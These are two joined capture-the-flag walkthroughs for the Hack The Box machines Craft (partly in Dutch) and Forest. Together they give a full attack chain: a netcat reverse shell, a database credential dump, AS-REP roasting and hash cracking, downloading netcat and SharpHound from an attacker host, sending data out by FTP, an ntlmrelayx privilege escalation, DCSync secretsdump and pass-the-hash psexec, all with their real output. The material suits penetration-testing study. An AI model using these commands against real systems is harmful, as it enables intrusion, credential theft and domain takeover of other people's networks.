response = requests.post('https://api.craft.htb/api/brew/', headers=headers, data=json_data, verify=False)
print("Done!")
root@fury-battlestation:~/htb/blog/craft# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.156] from (UNKNOWN) [10.10.10.110] 45619
python -c 'import pty; pty.spawn("/bin/sh")'
/opt/app # whoami         
whoami
root
/opt/app # ls -lah /root
ls -lah /root
total 16
drwx------    1 root     root        4.0K Nov 10 11:16 .
drwxr-xr-x    1 root     root        4.0K Feb 10  2019 ..
-rw-------    1 root     root          21 Nov 10 11:16 .ash_history
drwx------    1 root     root        4.0K Feb  9  2019 .cache
/opt/app # ^[[24;12Rls -lah /home
ls -lah /home
total 8
drwxr-xr-x    2 root     root        4.0K Jan 30  2019 .
drwxr-xr-x    1 root     root        4.0K Feb 10  2019 ..
/opt/app # ^[[24;12R

De root was een leugen! Het kostte me wat tijd, maar ik realiseerde me dat ik in een dokcontainer zat.

GOGS Credentials & User

Omdat ik me in de directory van de app bevond, las ik de inhoud van dbtest.py om de referenties voor de database te vinden:

#!/usr/bin/env python
 
import pymysql
from craft_api import settings
 
# test connection to mysql database
 
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)
 
try: 
    with connection.cursor() as cursor:
        sql = "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
        cursor.execute(sql)
        result = cursor.fetchone()
        print(result)
 
finally:
    connection.close()

De inloggegevens zijn opgeslagen in craft_api / settings.py, dus ik heb de inhoud van dat bestand weergegeven:

# Flask settings
FLASK_SERVER_NAME = 'api.craft.htb'
FLASK_DEBUG = False  # Do not use debug mode in production
 
# Flask-Restplus settings
RESTPLUS_SWAGGER_UI_DOC_EXPANSION = 'list'
RESTPLUS_VALIDATE = True
RESTPLUS_MASK_SWAGGER = False
RESTPLUS_ERROR_404_HELP = False
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'
 
# database
MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
MYSQL_DATABASE_DB = 'craft'
MYSQL_DATABASE_HOST = 'db'
SQLALCHEMY_TRACK_MODIFICATIONS = False

Daarna heb ik verbinding gemaakt met de database om te zien of er inloggegevens zijn die ik zou kunnen gebruiken:

/opt/app # ^[[50;12Rpython
python
Python 3.6.8 (default, Feb  6 2019, 01:56:13) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pymysql
import pymysql
>>> from craft_api import settings
from craft_api import settings
>>> connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
...                              user=settings.MYSQL_DATABASE_USER,
...                              password=settings.MYSQL_DATABASE_PASSWORD,
...                              db=settings.MYSQL_DATABASE_DB,
...                              cursorclass=pymysql.cursors.DictCursor)
>>> 

>>> def exec_sql(sql):
        cursor = connection.cursor()
        cursor.execute(sql)
        #result = cursor.fetchone()
        result = cursor.fetchall()
        print(result)def exec_sql(sql):
...         cursor = connection.cursor()
...         cursor.execute(sql)
...         #result = cursor.fetchone()
...         result = cursor.fetchall()
... 
        print(result)
... 

>>> exec_sql("SHOW DATABASES;")
exec_sql("SHOW DATABASES;")
[{'Database': 'craft'}, {'Database': 'information_schema'}]
>>> exec_sql("SHOW TABLES")
exec_sql("SHOW TABLES")
[{'Tables_in_craft': 'brew'}, {'Tables_in_craft': 'user'}]
>>> exec_sql("SELECT * FROM user")
exec_sql("SELECT * FROM user")
[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]
>>> 

De database bevat de volgende gegevens:

dinesh 4aUh0A8PbVJxgd
ebachman llJ77D8QFkLPQB
gilfoyle ZEU3N8WNM2rh4T

Ik heb ze geprobeerd op SSH, maar ze werkten niet. Ze leken echter te werken op het GOGS-platform. Gilfoyle had nog een privérepository die interessant leek:

Ik klikte de .ssh folder en zag de volgende ssh sleutels:

Deze 2 keys gedownload , en mbv chmod 600 op juiste ssh permissie ingesteld.

De sleutel is beveiligd met een wachtwoord. Gelukkig heeft Gilfoyle zijn GOGS hergebruikt passwoord, ZEU3N8WNM2rh4T, dus ik had de mogelijkheid om verbinding te maken met de machine:

root@kali:~/htb/craft/ssh# ssh gilfoyle@craft.htb -i id_rsa
The authenticity of host 'craft.htb (10.10.10.110)' can't be established.
ECDSA key fingerprint is SHA256:sFjoHo6ersU0f0BTzabUkFYHOr6hBzWsSK0MK5dwYAw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'craft.htb,10.10.10.110' (ECDSA) to the list of known hosts.


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Enter passphrase for key 'id_rsa': ZEU3N8WNM2rh4T
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gilfoyle@craft:~$ pwd
/home/gilfoyle
root@craft:/home/gilfoyle# cat user.txt
bbf4b0cadfa3d4e6d0914c9cd5a612d4
gilfoyle@craft:~$

Root verkrijgen

Nadat ik de gebruikersvlag had gekregen, herinnerde ik me een interessante map in de privérepository met de naam kluis, dus ik checkte het uit:

Na  wat te ggogelen vond ik de  application’s website.

Basically, the system uses token to grant access to services across machines. I also found a file named .vault-token in the user’s home directory, so I tried to see the token’s capabilities:

gilfoyle@craft:~$ cat ~/.vault-token 
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
gilfoyle@craft:~$ vault token capabilities f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
root
gilfoyle@craft:~$

Kortom, het systeem gebruikt token om toegang te verlenen tot services op verschillende machines. Ik vond ook een bestand met de naam .vault-token in de thuismap van de gebruiker, dus ik probeerde de mogelijkheden van het token te bekijken:

gilfoyle@craft:~$ vault login -address=https://vault.craft.htb:8200 token=f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                  Value
---                  -----
token                f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor       1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration       ∞
token_renewable      false
token_policies       ["root"]
identity_policies    []
policies             ["root"]
gilfoyle@craft:~$

Daarna heb ik verbinding gemaakt met SSH als root met behulp van de eenmalige wachtwoordoptie (OTP) van “Vault”:

gilfoyle@craft:~$ vault ssh -mode otp root@localhost
WARNING: No -role specified. Use -role to tell Vault which ssh role to use for
authentication. In the future, you will need to tell Vault which role to use.
For now, Vault will attempt to guess based on the API response. This will be
removed in the Vault 1.1.
Vault SSH: Role: "root_otp"
Vault could not locate "sshpass". The OTP code for the session is displayed
below. Enter this code in the SSH password prompt. If you install sshpass,
Vault can automatically perform this step for you.
OTP for the session is: 308a5ffa-89c3-7625-4f53-a4fb1b1a1841


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Password: 308a5ffa-89c3-7625-4f53-a4fb1b1a1841
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# pwd
/root
root@craft:~# cat root.txt 
831d64ef54d92c1af795daae28a11591
root@craft:~#

Auteur : Jacco Straathof

htb-forest-nl

As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!

First let’s try enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
 ============================== 
|    Groups on 10.10.10.161    |
 ============================== 
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.

┌─[✗]─[puck@parrot-lt]─[~/htb/legacy/forrest]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

 


root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e

After trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with John

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads per process (8 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB)
4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55
1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168
Waiting for 3 children to terminate
2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69
3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123
Session completed
┌─[puck@parrot-lt]─[~/htb/forrest]

So apparently Alfresco’s password is s3rvice. ll you have to do is get the user hash and start escalating privileges

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir

Privilege Escalation

The next step is escalating privileges, after pressing CTRL-C too many times I decided it was time to install a simple fallback.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe

PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950 20191025120253_BloodHound.zip
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe


Data: 1402196 bytes of 1402196 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./SharpHound.exe All
2022-09-06T03:34:37.8848043-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-09-06T03:34:38.2441827-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:38.3847964-07:00|INFORMATION|Initializing SharpHound at 3:34 AM on 9/6/2022
2022-09-06T03:34:39.6035545-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:40.9785510-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-09-06T03:34:41.4004375-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-09-06T03:34:41.4004375-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-09-06T03:35:11.4786322-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 47 MB RAM
2022-09-06T03:35:25.5255232-07:00|INFORMATION|Consumers finished, closing output channel
2022-09-06T03:35:25.5567715-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 49 MB RAM
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Enumeration finished in 00:00:44.7682293
2022-09-06T03:35:25.7442762-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-09-06T03:35:25.7442762-07:00|INFORMATION|SharpHound Enumeration Completed at 3:35 AM on 9/6/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


Directory: C:\Users\svc-alfresco\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2022 3:35 AM 18873 20220906033525_BloodHound.zip
-a---- 9/6/2022 3:35 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/6/2022 3:29 AM 1051648 SharpHound.exe


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20220906033525_BloodHound.zip
Info: Downloading 20220906033525_BloodHound.zip to ./20220906033525_BloodHound.zip


Info: Download successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

After the SharpHound script and binary file are transferred, I run them with the user svc-alfresco and the script provides a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey was to easily create and run an FTP script.

PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)): 
put 20191025120253_BloodHound.zip
quit

Of course, this approach requires an active FTP server on my attacker, which can be easily done with Python

root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).

Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.

In the “bloodhound overview” of the shortest path to domain manager, I see that a user who is part of the ‘Exchange Windows permissions’ group has the ability to write the ACL of the entire HTB.Local domain, for example the Password hashes. I can also see that the svc-alfresco user has GenericAll permissions for that particular group through their delegated memberships of `Service Accounts`,` Privileged IT Accounts` and `Account Operators`.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred

When you add the svc alfresco account to the ‘Exchange Windows Permissions’ group, it will be deleted again after a few minutes, which is quite a pain. So I decide to add my own user to the domain with the same password as user svc-alfresco and add to the group `Exchange Windows permissions`. However, after that, I lingered for a long time due to the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing them in the next step!

root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Now all I have to do is browse to the localhost connection and provide valid credentials, NTLMRelay will do all the hard work and change the permissions for me.I open a browser for localhost and provide the sedje credentials.

[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss

And ntlmrelayx.py already tells me what to do, sedje now has proper permissions to continue secretsdump.py.

root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---

Use secretsdump.py to get all the hashes in the domain

root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
